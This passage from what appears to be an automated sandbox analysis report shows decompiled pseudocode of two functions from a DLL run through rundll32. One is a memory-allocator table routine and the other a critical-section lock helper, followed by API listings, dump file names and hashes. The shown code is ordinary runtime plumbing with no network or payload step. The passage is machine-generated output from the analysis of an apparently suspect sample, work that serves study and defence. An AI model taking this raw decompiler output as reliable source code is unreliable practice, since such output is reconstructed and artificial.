                                                                        				void* _t18;
                                                                        				intOrPtr* _t20;
                                                                        				void* _t24;
                                                                        				signed int _t26;
                                                                        				void* _t27;
                                                                        				intOrPtr* _t30;
                                                                        
                                                                        				_t15 =  *0x10050a48; // 0x0
                                                                        				_t26 =  *0x10050a58; // 0x0
                                                                        				if(_t15 != _t26) {
                                                                        					L4:
                                                                        					_t27 =  *0x10050a4c; // 0x0
                                                                        					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
                                                                        					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
                                                                        					 *(_t30 + 0x10) = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                                                                        						 *(_t30 + 0xc) = _t18;
                                                                        						if(_t18 != 0) {
                                                                        							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
                                                                        							 *_t30 = 0;
                                                                        							 *((intOrPtr*)(_t30 + 4)) = 0;
                                                                        							 *0x10050a48 =  *0x10050a48 + 1;
                                                                        							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
                                                                        							_t20 = _t30;
                                                                        						} else {
                                                                        							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
                                                                        							goto L5;
                                                                        						}
                                                                        					} else {
                                                                        						L5:
                                                                        						_t20 = 0;
                                                                        					}
                                                                        					return _t20;
                                                                        				} else {
                                                                        					_t2 = _t26 * 4; // 0x50
                                                                        					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
                                                                        					if(_t24 != 0) {
                                                                        						 *0x10050a58 =  *0x10050a58 + 0x10;
                                                                        						 *0x10050a4c = _t24;
                                                                        						_t15 =  *0x10050a48; // 0x0
                                                                        						goto L4;
                                                                        					} else {
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                        • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap$FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 3499195154-0
                                                                        • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                        • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                        • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10037A1B(signed int _a4) {
                                                                        				struct _CRITICAL_SECTION* _t13;
                                                                        				signed int _t21;
                                                                        				intOrPtr* _t24;
                                                                        
                                                                        				if( *0x1004f350 == 0) {
                                                                        					E100379F7();
                                                                        				}
                                                                        				_t21 = _a4;
                                                                        				_t24 = 0x1004f158 + _t21 * 4;
                                                                        				if( *_t24 == 0) {
                                                                        					EnterCriticalSection(0x1004f19c);
                                                                        					if( *_t24 == 0) {
                                                                        						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
                                                                        						 *_t24 =  *_t24 + 1;
                                                                        					}
                                                                        					LeaveCriticalSection(0x1004f19c);
                                                                        				}
                                                                        				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
                                                                        				EnterCriticalSection(_t13);
                                                                        				return _t13;
                                                                        			}







                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                        • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                        • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                          • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterInitialize$Leave
                                                                        • String ID:
                                                                        • API String ID: 713024617-0
                                                                        • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
                                                                        • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%